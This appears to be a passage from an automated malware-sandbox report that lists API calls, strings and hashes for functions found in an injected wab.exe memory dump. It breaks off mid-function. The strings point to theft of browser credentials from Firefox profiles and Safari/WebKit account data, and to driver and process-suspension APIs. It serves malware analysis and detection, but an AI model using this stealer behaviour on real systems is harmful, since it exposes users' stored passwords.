                                                  • Source File: 0000000C.00000002.216342952571.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: memcpy$CountCounterCurrentPerformanceProcessQuerySystemTickTime
                                                  • String ID:
                                                  • API String ID: 4218492932-0
                                                  • Opcode ID: 5b3bc6f1ade46934c27ca3d947f7b8c79a38ab90bf8452c3a07df30f33fc823a
                                                  • Instruction ID: a427a134a5f43ecd7f569dc5a6dbdc76404a49e7a1b6a3986382666b5299f542
                                                  • Opcode Fuzzy Hash: 5b3bc6f1ade46934c27ca3d947f7b8c79a38ab90bf8452c3a07df30f33fc823a
                                                  • Instruction Fuzzy Hash: 141184B39001286BEB00AFA5DC899DEB7ACEB1A210F454837FA15D7144E634E2488795
                                                  Function 0040987A Relevance: 12.0, APIs: 8, Instructions: 42clipboardmemoryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • EmptyClipboard.USER32 ref: 00409882
                                                  • wcslen.MSVCRT ref: 0040988F
                                                  • GlobalAlloc.KERNEL32(00002000,00000002,?,?,?,?,00411A1E,-00000210), ref: 0040989F
                                                  • GlobalFix.KERNEL32(00000000), ref: 004098AC
                                                  • memcpy.MSVCRT ref: 004098B5
                                                  • GlobalUnWire.KERNEL32(00000000), ref: 004098BE
                                                  • SetClipboardData.USER32(0000000D,00000000), ref: 004098C7
                                                  • CloseClipboard.USER32 ref: 004098D7
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.216342952571.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: ClipboardGlobal$AllocCloseDataEmptyWirememcpywcslen
                                                  • String ID:
                                                  • API String ID: 2014503067-0
                                                  • Opcode ID: ef81b411bc32b98b0d58beac2f1626bda71a649682fb6f24e39e44ffb2f3f244
                                                  • Instruction ID: b754b6ca90195c8d8a6f67e3e00c953256c5cf8724ac1a445a604cc17dd28da6
                                                  • Opcode Fuzzy Hash: ef81b411bc32b98b0d58beac2f1626bda71a649682fb6f24e39e44ffb2f3f244
                                                  • Instruction Fuzzy Hash: 4AF0967B1402246BD2112FA6AC4DD2B772CFB86B56B05013AF90592251DA3448004779
                                                  Function 004182CE Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 69windowCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetLastError.KERNEL32 ref: 004182D7
                                                    • Part of subcall function 0041739B: GetVersionExW.KERNEL32(?), ref: 004173BE
                                                  • FormatMessageW.KERNEL32(00001300,00000000,00000000,00000000,?,00000000,00000000), ref: 004182FE
                                                  • FormatMessageA.KERNEL32(00001300,00000000,00000000,00000000,?,00000000,00000000), ref: 00418327
                                                  • LocalFree.KERNEL32(?), ref: 00418342
                                                  • ??3@YAXPAX@Z.MSVCRT ref: 00418370
                                                    • Part of subcall function 00417434: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,00000000,?,?,7726DF80,?,0041755F,?), ref: 00417452
                                                    • Part of subcall function 00417434: malloc.MSVCRT ref: 00417459
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.216342952571.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: FormatMessage$??3@ByteCharErrorFreeLastLocalMultiVersionWidemalloc
                                                  • String ID: OsError 0x%x (%u)
                                                  • API String ID: 403622227-2664311388
                                                  • Opcode ID: 4fd697d7e384524c9f2c5a32db345d7fa765ac123a5e8bcccc5a3c31b8d6871e
                                                  • Instruction ID: 20f22e5b187e4483f2e635e74e626e0383ca95cf640bb4168ff376264581b0c9
                                                  • Opcode Fuzzy Hash: 4fd697d7e384524c9f2c5a32db345d7fa765ac123a5e8bcccc5a3c31b8d6871e
                                                  • Instruction Fuzzy Hash: 6011B634901128FBCB11ABE2DC49CDF7F78FF85B54B10405AF811A2251DB754A81D7A9
                                                  Function 00401806 Relevance: 1.5, APIs: 1, Instructions: 45COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.216342952571.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: ??2@??3@memcpymemset
                                                  • String ID:
                                                  • API String ID: 1865533344-0
                                                  • Opcode ID: f3de4b73387da6c78884f7b0b81a8c47798430fc751eec9b9c4e2da2d29500ae
                                                  • Instruction ID: 142cde259e2f0f6626273334703b570cf32d48e622dac596d848113b95f58250
                                                  • Opcode Fuzzy Hash: f3de4b73387da6c78884f7b0b81a8c47798430fc751eec9b9c4e2da2d29500ae
                                                  • Instruction Fuzzy Hash: D7113C71900209EFDF10AF95C805AAE3B71FF09325F04C16AFD15662A1C7798E21EF5A
                                                  Function 004018C0 Relevance: 1.5, APIs: 1, Instructions: 6nativeCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • NtdllDefWindowProc_W.NTDLL(?,?,?,?,00401B0D,?,?,?), ref: 004018D2
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.216342952571.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: NtdllProc_Window
                                                  • String ID:
                                                  • API String ID: 4255912815-0
                                                  • Opcode ID: 3de349333402391b5f3bd83c09a178b3b388cc2d8cda5cc5e9d51b86f8a07b54
                                                  • Instruction ID: 27e4c09127093a565ccbabfb03fa630377511b1425115cef73ae3fc8c8acf6c4
                                                  • Opcode Fuzzy Hash: 3de349333402391b5f3bd83c09a178b3b388cc2d8cda5cc5e9d51b86f8a07b54
                                                  • Instruction Fuzzy Hash: BEC0483A108200FFCA024B81DD08D0ABFA2BB98320F00C868B2AC0403187338022EB02
                                                  Function 00402279 Relevance: 110.5, APIs: 9, Strings: 54, Instructions: 285COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • _wcsicmp.MSVCRT ref: 004022A6
                                                  • _wcsicmp.MSVCRT ref: 004022D7
                                                  • _wcsicmp.MSVCRT ref: 00402305
                                                  • _wcsicmp.MSVCRT ref: 00402333
                                                    • Part of subcall function 0040AA29: wcslen.MSVCRT ref: 0040AA3C
                                                    • Part of subcall function 0040AA29: memcpy.MSVCRT ref: 0040AA5B
                                                  • memset.MSVCRT ref: 0040265F
                                                  • memcpy.MSVCRT ref: 0040269B
                                                    • Part of subcall function 00404423: GetProcAddress.KERNEL32(?,00000000), ref: 00404453
                                                    • Part of subcall function 00404423: FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
                                                  • memcpy.MSVCRT ref: 004026FF
                                                  • LocalFree.KERNEL32(?,?,?,00000000,?,?,00000000,?), ref: 00402764
                                                  • FreeLibrary.KERNEL32(00000000,?,?,00000000,?), ref: 00402775
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.216342952571.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: _wcsicmp$Freememcpy$Library$AddressLocalProcmemsetwcslen
                                                  • String ID: !$#$$$&$&$'$)$/$0$2$8$=$>$>$@$A$Account$Data$F$H$H$I$K$K$L$O$Path$S$X$\$^$`$a$b$com.apple.Safari$com.apple.WebKit2WebProcess$g$h$n$n$q$server$t$t$t$u$u$w$y$y$z${$}$~
                                                  • API String ID: 577499730-1134094380
                                                  • Opcode ID: 9397f4940cefbe0ceec442a857739dd93941f810d0ac8ce2dbc103f0b42f9f84
                                                  • Instruction ID: 24bcbd005531c38afe4d7004bd238553ea51a424b60caac2517de9c8923e7683
                                                  • Opcode Fuzzy Hash: 9397f4940cefbe0ceec442a857739dd93941f810d0ac8ce2dbc103f0b42f9f84
                                                  • Instruction Fuzzy Hash: 8FE1F32010C7C19DD332D678884978BBFD45BA7328F484B9EF1E89A2D2D7B98509C767
                                                  Function 0040C87B Relevance: 54.5, APIs: 27, Strings: 4, Instructions: 285stringCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.216342952571.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: _wcsicmpmemset$_wcsnicmpwcslen$ByteCharMultiWidewcschrwcscpy$memcpystrchrstrlen
                                                  • String ID: :stringdata$ftp://$http://$https://
                                                  • API String ID: 2787044678-1921111777
                                                  • Opcode ID: 5cfdb451540a99f12352c14b787623eda213fcfbf47060a2a7a9031bc80669e4
                                                  • Instruction ID: 1dd8f84a331a8d1f0195812dc1f06ff326a48265e58e3ad24d859c5fcdf3acb9
                                                  • Opcode Fuzzy Hash: 5cfdb451540a99f12352c14b787623eda213fcfbf47060a2a7a9031bc80669e4
                                                  • Instruction Fuzzy Hash: C191C571540219AEEF10EF65DC82EEF776DEF41318F01016AF948B7181EA38ED518BA9
                                                  Function 00414002 Relevance: 49.3, APIs: 25, Strings: 3, Instructions: 265COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetDlgItem.USER32(?,000003E9), ref: 0041402F
                                                  • GetDlgItem.USER32(?,000003E8), ref: 0041403B
                                                  • GetWindowLongW.USER32(00000000,000000F0), ref: 0041404A
                                                  • GetWindowLongW.USER32(?,000000F0), ref: 00414056
                                                  • GetWindowLongW.USER32(00000000,000000EC), ref: 0041405F
                                                  • GetWindowLongW.USER32(?,000000EC), ref: 0041406B
                                                  • GetWindowRect.USER32(00000000,?), ref: 0041407D
                                                  • GetWindowRect.USER32(?,?), ref: 00414088
                                                  • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 0041409C
                                                  • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004140AA
                                                  • GetDC.USER32 ref: 004140E3
                                                  • wcslen.MSVCRT ref: 00414123
                                                  • GetTextExtentPoint32W.GDI32(?,00000000,00000000,?), ref: 00414134
                                                  • ReleaseDC.USER32(?,?), ref: 00414181
                                                  • _snwprintf.MSVCRT ref: 00414244
                                                  • SetWindowTextW.USER32(?,?), ref: 00414258
                                                  • SetWindowTextW.USER32(?,00000000), ref: 00414276
                                                  • GetDlgItem.USER32(?,00000001), ref: 004142AC
                                                  • GetWindowRect.USER32(00000000,?), ref: 004142BC
                                                  • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004142CA
                                                  • GetClientRect.USER32(?,?), ref: 004142E1
                                                  • GetWindowRect.USER32(?,?), ref: 004142EB
                                                  • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000206), ref: 00414331
                                                  • GetClientRect.USER32(?,?), ref: 0041433B
                                                  • SetWindowPos.USER32(?,00000000,?,?,?,?,00000204), ref: 00414373
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.216342952571.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: Window$Rect$Long$ItemPointsText$Client$ExtentPoint32Release_snwprintfwcslen
                                                  • String ID: %s:$EDIT$STATIC
                                                  • API String ID: 2080319088-3046471546
                                                  • Opcode ID: 4cffa952f3a039c60e8efdb869f217de44d75a47fa5f06f0d0d0713d1b76c38a
                                                  • Instruction ID: eff71af8639f47ea0b7533f6321954d8b94ad3b67000e3ed03306cc56154d199
                                                  • Opcode Fuzzy Hash: 4cffa952f3a039c60e8efdb869f217de44d75a47fa5f06f0d0d0713d1b76c38a
                                                  • Instruction Fuzzy Hash: F8B1DF71108301AFD721DFA9C985E6BBBF9FF88704F004A2DF69582261DB75E9448F16
                                                  Function 004131DC Relevance: 42.2, APIs: 22, Strings: 2, Instructions: 214windowCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • EndDialog.USER32(?,?), ref: 00413221
                                                  • GetDlgItem.USER32(?,000003EA), ref: 00413239
                                                  • SendMessageW.USER32(00000000,000000B1,00000000,0000FFFF), ref: 00413257
                                                  • SendMessageW.USER32(?,00000301,00000000,00000000), ref: 00413263
                                                  • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 0041326B
                                                  • memset.MSVCRT ref: 00413292
                                                  • memset.MSVCRT ref: 004132B4
                                                  • memset.MSVCRT ref: 004132CD
                                                  • memset.MSVCRT ref: 004132E1
                                                  • memset.MSVCRT ref: 004132FB
                                                  • memset.MSVCRT ref: 00413310
                                                  • GetCurrentProcess.KERNEL32 ref: 00413318
                                                  • ReadProcessMemory.KERNEL32(00000000,?,00000080,00000000), ref: 0041333B
                                                  • ReadProcessMemory.KERNEL32(?,?,00000080,00000000), ref: 0041336D
                                                  • memset.MSVCRT ref: 004133C0
                                                  • GetCurrentProcessId.KERNEL32 ref: 004133CE
                                                  • memcpy.MSVCRT ref: 004133FC
                                                  • wcscpy.MSVCRT ref: 0041341F
                                                  • _snwprintf.MSVCRT ref: 0041348E
                                                  • SetDlgItemTextW.USER32(?,000003EA,?), ref: 004134A6
                                                  • GetDlgItem.USER32(?,000003EA), ref: 004134B0
                                                  • SetFocus.USER32(00000000), ref: 004134B7
                                                  Strings
                                                  • {Unknown}, xrefs: 004132A6
                                                  • Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X, xrefs: 00413483
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.216342952571.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: memset$Process$ItemMessageSend$CurrentMemoryRead$DialogFocusText_snwprintfmemcpywcscpy
                                                  • String ID: Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X${Unknown}
                                                  • API String ID: 4111938811-1819279800
                                                  • Opcode ID: 97bbb4bd5fc40a2980dfba304632497cbec8fb91d9ab00b7ac9f2109681e0e22
                                                  • Instruction ID: fb691a4f2f0ee0f23db40d54bf7b3fb7beca904c55697b54c7815e943e903c38
                                                  • Opcode Fuzzy Hash: 97bbb4bd5fc40a2980dfba304632497cbec8fb91d9ab00b7ac9f2109681e0e22
                                                  • Instruction Fuzzy Hash: A97182B280021DBFEB219F51DC45EEA3B7CFB08355F0440B6F508A6161DB799E948F69
                                                  Function 00401198 Relevance: 39.2, APIs: 26, Instructions: 185COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetDlgItem.USER32(?,000003EC), ref: 004011F0
                                                  • ChildWindowFromPoint.USER32(?,?,?), ref: 00401202
                                                  • GetDlgItem.USER32(?,000003EE), ref: 00401238
                                                  • ChildWindowFromPoint.USER32(?,?,?), ref: 00401245
                                                  • GetDlgItem.USER32(?,000003EC), ref: 00401273
                                                  • ChildWindowFromPoint.USER32(?,?,?), ref: 00401285
                                                  • GetModuleHandleW.KERNEL32(00000000,?,?), ref: 0040128E
                                                  • LoadCursorW.USER32(00000000,00000067), ref: 00401297
                                                  • SetCursor.USER32(00000000,?,?), ref: 0040129E
                                                  • GetDlgItem.USER32(?,000003EE), ref: 004012BF
                                                  • ChildWindowFromPoint.USER32(?,?,?), ref: 004012CC
                                                  • GetDlgItem.USER32(?,000003EC), ref: 004012E6
                                                  • SetBkMode.GDI32(?,00000001), ref: 004012F2
                                                  • SetTextColor.GDI32(?,00C00000), ref: 00401300
                                                  • GetSysColorBrush.USER32(0000000F), ref: 00401308
                                                  • GetDlgItem.USER32(?,000003EE), ref: 00401329
                                                  • EndDialog.USER32(?,?), ref: 0040135E
                                                  • DeleteObject.GDI32(?), ref: 0040136A
                                                  • GetDlgItem.USER32(?,000003ED), ref: 0040138F
                                                  • ShowWindow.USER32(00000000), ref: 00401398
                                                  • GetDlgItem.USER32(?,000003EE), ref: 004013A4
                                                  • ShowWindow.USER32(00000000), ref: 004013A7
                                                  • SetDlgItemTextW.USER32(?,000003EE,0045D778), ref: 004013B8
                                                  • SetWindowTextW.USER32(?,00000000), ref: 004013CA
                                                  • SetDlgItemTextW.USER32(?,000003EA,?), ref: 004013E2
                                                  • SetDlgItemTextW.USER32(?,000003EC,?), ref: 004013F3
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.216342952571.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: Item$Window$Text$ChildFromPoint$ColorCursorShow$BrushDeleteDialogHandleLoadModeModuleObject
                                                  • String ID:
                                                  • API String ID: 829165378-0
                                                  • Opcode ID: 19a332b7149b8c9d9d3d6ff7d6a76f82ec59d5834f8b717de0dd62f1513d673f
                                                  • Instruction ID: caa3714a391556dce09a7e5fb0b25e31ef738818e6d8753142f97b5ec5ee2caf
                                                  • Opcode Fuzzy Hash: 19a332b7149b8c9d9d3d6ff7d6a76f82ec59d5834f8b717de0dd62f1513d673f
                                                  • Instruction Fuzzy Hash: 0051B134500708AFEB32AF61DC85E6E7BB9FB44301F10093AF552A61F1C7B9A991DB19
                                                  Function 0040414F Relevance: 35.1, APIs: 13, Strings: 7, Instructions: 145COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • memset.MSVCRT ref: 00404172
                                                    • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                    • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                    • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                    • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                    • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                  • wcscpy.MSVCRT ref: 004041D6
                                                  • wcscpy.MSVCRT ref: 004041E7
                                                  • memset.MSVCRT ref: 00404200
                                                  • memset.MSVCRT ref: 00404215
                                                  • _snwprintf.MSVCRT ref: 0040422F
                                                  • wcscpy.MSVCRT ref: 00404242
                                                  • memset.MSVCRT ref: 0040426E
                                                  • memset.MSVCRT ref: 004042CD
                                                  • memset.MSVCRT ref: 004042E2
                                                  • _snwprintf.MSVCRT ref: 004042FE
                                                  • wcscpy.MSVCRT ref: 00404311
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.216342952571.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: memset$wcscpy$_snwprintfwcslen$AttributesFilewcscat
                                                  • String ID: AE$General$IsRelative$Path$Profile%d$profiles.ini$EA
                                                  • API String ID: 2454223109-1580313836
                                                  • Opcode ID: 14b0d88d68d2695e792434069e0167c5559d7d25d781ac3d9655dfb0e2d65502
                                                  • Instruction ID: 5f54f20862f9259acc4f568515dc65a5c395277ecd0331c6beb9e3a358a2eb32
                                                  • Opcode Fuzzy Hash: 14b0d88d68d2695e792434069e0167c5559d7d25d781ac3d9655dfb0e2d65502
                                                  • Instruction Fuzzy Hash: 18512FB294012CBADB20EB55DC45ECFB7BCBF55744F0040E6B50CA2142EA795B84CFAA
                                                  Function 00411346 Relevance: 31.8, APIs: 13, Strings: 5, Instructions: 263windowregistryclipboardCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 0040D407: LoadMenuW.USER32(00000000), ref: 0040D40F
                                                  • SetMenu.USER32(?,00000000), ref: 00411453
                                                  • SendMessageW.USER32(00000000,00000404,00000001,?), ref: 00411486
                                                  • GetModuleHandleW.KERNEL32(00000000), ref: 00411495
                                                  • LoadImageW.USER32(00000000,00000068,00000000,00000000,00000000,00009060), ref: 004114A2
                                                  • GetModuleHandleW.KERNEL32(00000000), ref: 004114D9
                                                  • CreateWindowExW.USER32(00000000,SysListView32,00000000,50810809,00000000,00000000,00000190,000000C8,?,00000103,00000000,00000000), ref: 00411500
                                                  • memcpy.MSVCRT ref: 004115C8
                                                  • ShowWindow.USER32(?,?), ref: 004115FE
                                                  • GetFileAttributesW.KERNEL32(0045E078), ref: 0041162F
                                                  • GetTempPathW.KERNEL32(00000104,0045E078), ref: 0041163F
                                                  • RegisterClipboardFormatW.USER32(commdlg_FindReplace), ref: 0041167A
                                                  • SendMessageW.USER32(?,00000404,00000002,?), ref: 004116B4
                                                  • SendMessageW.USER32(?,0000040B,00001001,00000000), ref: 004116C7
                                                    • Part of subcall function 00404592: wcslen.MSVCRT ref: 004045AF
                                                    • Part of subcall function 00404592: SendMessageW.USER32(?,00001061,?,?), ref: 004045D3
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.216342952571.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: MessageSend$HandleLoadMenuModuleWindow$AttributesClipboardCreateFileFormatImagePathRegisterShowTempmemcpywcslen
                                                  • String ID: /nosaveload$SysListView32$commdlg_FindReplace$report.html$xE
                                                  • API String ID: 4054529287-3175352466
                                                  • Opcode ID: 80e2c4da556a6dfda94225f517483429c905b521daebd2f44f7cad3fe39d77d4
                                                  • Instruction ID: 800f7bfcdfcb1fd3e7c20450dd8eb4425a557a8a4e928c852398501c1500280f
                                                  • Opcode Fuzzy Hash: 80e2c4da556a6dfda94225f517483429c905b521daebd2f44f7cad3fe39d77d4
                                                  • Instruction Fuzzy Hash: CBA1A271640388AFEB11DF69CC89FCA3FA5AF55304F0404B9FE48AF292C6B59548CB65
                                                  Function 00414F1E Relevance: 31.6, APIs: 12, Strings: 6, Instructions: 103COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.216342952571.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: wcscat$_snwprintfmemset$wcscpy
                                                  • String ID: color="#%s"$ size="%d"$</b>$</font>$<b>$<font
                                                  • API String ID: 3143752011-1996832678
                                                  • Opcode ID: 054461c97bc12b3ac6a6f5d4f147efcfafa35783d9cb78a1f9dd62ddbda29cb0
                                                  • Instruction ID: fbd97de1ae08b3d7bb58c913f73a739646adbf5bc1eafa8de66ed769fffaada2
                                                  • Opcode Fuzzy Hash: 054461c97bc12b3ac6a6f5d4f147efcfafa35783d9cb78a1f9dd62ddbda29cb0
                                                  • Instruction Fuzzy Hash: 25310BB2500315BEE720AA55AC82DBF73BC9F81728F10815FF614621C2EB3C5A854A1D
                                                  Function 0041352F Relevance: 31.5, APIs: 9, Strings: 9, Instructions: 41libraryloaderCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetModuleHandleW.KERNEL32(ntdll.dll,-00000108,0040DE02,?,000000FF,00000000,00000104), ref: 00413542
                                                  • GetProcAddress.KERNEL32(00000000,NtQuerySystemInformation), ref: 00413559
                                                  • GetProcAddress.KERNEL32(NtLoadDriver), ref: 0041356B
                                                  • GetProcAddress.KERNEL32(NtUnloadDriver), ref: 0041357D
                                                  • GetProcAddress.KERNEL32(NtOpenSymbolicLinkObject), ref: 0041358F
                                                  • GetProcAddress.KERNEL32(NtQuerySymbolicLinkObject), ref: 004135A1
                                                  • GetProcAddress.KERNEL32(NtQueryObject), ref: 004135B3
                                                  • GetProcAddress.KERNEL32(NtSuspendProcess), ref: 004135C5
                                                  • GetProcAddress.KERNEL32(NtResumeProcess), ref: 004135D7
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.216342952571.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: AddressProc$HandleModule
                                                  • String ID: NtLoadDriver$NtOpenSymbolicLinkObject$NtQueryObject$NtQuerySymbolicLinkObject$NtQuerySystemInformation$NtResumeProcess$NtSuspendProcess$NtUnloadDriver$ntdll.dll
                                                  • API String ID: 667068680-2887671607
                                                  • Opcode ID: 57b3ef5f97466978e1990f74adf29af07ff290b7ce4571feabf87054e0031f76
                                                  • Instruction ID: 8dd6b0f06cc06780b82abcfa5335c49c30c65db347d43124f897848efd9f6b7c
                                                  • Opcode Fuzzy Hash: 57b3ef5f97466978e1990f74adf29af07ff290b7ce4571feabf87054e0031f76
                                                  • Instruction Fuzzy Hash: 8C015E75D48324AACB339F75AD09A053FB1EF04797B1004B7A80492266DAF9815CDE4C
                                                  Function 0040FB5D Relevance: 29.9, APIs: 10, Strings: 7, Instructions: 185COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.216342952571.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: _snwprintfmemset$wcscpy$wcscat
                                                  • String ID: bgcolor="%s"$ nowrap$&nbsp;$</table><p>$<font color="%s">%s</font>$<table border="1" cellpadding="5">$<tr><td%s nowrap><b>%s</b><td bgcolor=#%s%s>%s
                                                  • API String ID: 1607361635-601624466
                                                  • Opcode ID: 014fce8712d2099ed920d1c21251e5be9fb3fd75ebba54fa6feefa75023380bc
                                                  • Instruction ID: 75b7dc7a1ab43caf41f6bee0dc73fa500ed8492db64f50ed133d22c14cecb56c
                                                  • Opcode Fuzzy Hash: 014fce8712d2099ed920d1c21251e5be9fb3fd75ebba54fa6feefa75023380bc
                                                  • Instruction Fuzzy Hash: 09619F71900208BFDF25EF54CC86EAE7BB9FF44310F1040AAF805A7296DB399A59CB55
                                                  Function 0041019A Relevance: 28.1, APIs: 10, Strings: 6, Instructions: 122COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.216342952571.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: _snwprintf$memset$wcscpy
                                                  • String ID: bgcolor="%s"$ width="%s"$</font>$<font color="%s">$<table border="1" cellpadding="5"><tr%s>$<th%s>%s%s%s
                                                  • API String ID: 2000436516-3842416460
                                                  • Opcode ID: 3adec529592eaa12cbb3371149c11df059df1660bb42a65f2cf1cf9995de4c18
                                                  • Instruction ID: 0effb7443b15cd0e53e626898d2c9f551e6481245c02f09bcd1282082c9ffe88
                                                  • Opcode Fuzzy Hash: 3adec529592eaa12cbb3371149c11df059df1660bb42a65f2cf1cf9995de4c18
                                                  • Instruction Fuzzy Hash: C74163B194021D7AEB20EF55DC46EEB73BCFF45304F0440ABB908A2141E7759B988F66
                                                  Function 004035AD Relevance: 27.1, APIs: 18, Instructions: 93windowCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 0041083A: memset.MSVCRT ref: 0041087D
                                                    • Part of subcall function 0041083A: memset.MSVCRT ref: 00410892
                                                    • Part of subcall function 0041083A: GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 004108A4
                                                    • Part of subcall function 0041083A: SHGetFileInfoW.SHELL32(?,00000000,?,000002B4,00004001), ref: 004108C2
                                                    • Part of subcall function 0041083A: SendMessageW.USER32(?,00001003,00000001,?), ref: 004108FF
                                                    • Part of subcall function 0041083A: SendMessageW.USER32(?,00001003,00000000,?), ref: 00410936
                                                    • Part of subcall function 0041083A: GetModuleHandleW.KERNEL32(00000000), ref: 00410951
                                                    • Part of subcall function 0041083A: LoadImageW.USER32(00000000,00000085,00000000,00000010,00000010,00001000), ref: 00410963
                                                    • Part of subcall function 0041083A: GetModuleHandleW.KERNEL32(00000000), ref: 0041096E
                                                    • Part of subcall function 0041083A: LoadImageW.USER32(00000000,00000086,00000000,00000010,00000010,00001000), ref: 00410980
                                                    • Part of subcall function 0041083A: GetSysColor.USER32(0000000F), ref: 00410999
                                                  • GetModuleHandleW.KERNEL32(00000000), ref: 004035BF
                                                  • LoadIconW.USER32(00000000,00000072), ref: 004035CA
                                                  • GetModuleHandleW.KERNEL32(00000000), ref: 004035DF
                                                  • LoadIconW.USER32(00000000,00000074), ref: 004035E4
                                                  • GetModuleHandleW.KERNEL32(00000000), ref: 004035F3
